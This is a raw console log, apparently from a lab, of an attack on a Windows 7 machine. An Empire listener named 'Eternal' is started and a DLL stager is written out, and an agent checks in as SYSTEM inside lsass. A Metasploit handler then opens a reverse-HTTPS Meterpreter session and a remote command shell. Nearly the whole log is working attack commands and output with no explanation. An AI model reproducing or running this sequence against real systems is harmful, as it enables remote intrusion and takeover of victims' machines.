(Empire) > set Name Eternal
[!] Please choose 'ip_whitelist' or 'ip_blacklist'
(Empire) > list
list       listeners
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > set Name Eternal
(Empire: listeners) > set Host http://192.168.31.30
(Empire: listeners) > set Port 8080
(Empire: listeners) > execute
[!] Error starting listener on port 8080: [Errno 98] Address already in use
[!] Error starting listener on port 8080, port likely already in use.
(Empire: listeners) > set Port 8000
(Empire: listeners) > execute
[*] Listener 'Eternal' successfully started.
(Empire: listeners) > list
[*] Active listeners:
  ID  Name     Host                       Type     Delay/Jitter  KillDate  Redirect Target
  --  ----     ----                       -------  ------------  --------  ---------------
  1   Eternal  http://192.168.31.30:8000  native   5/0.0
[*] Stager output written out to: /tmp/launcher.dll
(Empire: stager/dll) > [+] Initial agent RDZ4SYWEFTKBF3FD from 192.168.31.252 now active
(Empire: stager/dll) > agents
[*] Active agents:
  Name              Internal IP     Machine Name     Username           Process    Delay  Last Seen
  ---------         -----------     ------------     ---------          -------    -----  --------------------
  RDZ4SYWEFTKBF3FD  192.168.31.252  USER-20170312IA  *WorkGroup\SYSTEM  lsass/792  5/0.0  2017-04-27 02:09:35
msf > use exploit/multi/handler
msf exploit(handler) >
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_h
set PAYLOAD windows/meterpreter/reverse_hop_http
set PAYLOAD windows/meterpreter/reverse_http
set PAYLOAD windows/meterpreter/reverse_http_proxy_pstore
set PAYLOAD windows/meterpreter/reverse_https
set PAYLOAD windows/meterpreter/reverse_https_proxy
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.31.30
LHOST => 192.168.31.30
msf exploit(handler) > set LPORT 9999
LPORT => 9999
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://192.168.31.30:9999
[*] Starting the payload handler...
[*] https://192.168.31.30:9999 handling request from 192.168.31.252; (UUID: 7pzlvccd) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.31.30:9999 -> 192.168.31.252:49714) at 2017-04-27 02:20:13 +0800
meterpreter > sysinfo
Computer        : USER-20170312IA
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WorkGroup
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > shell
Process 2432 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。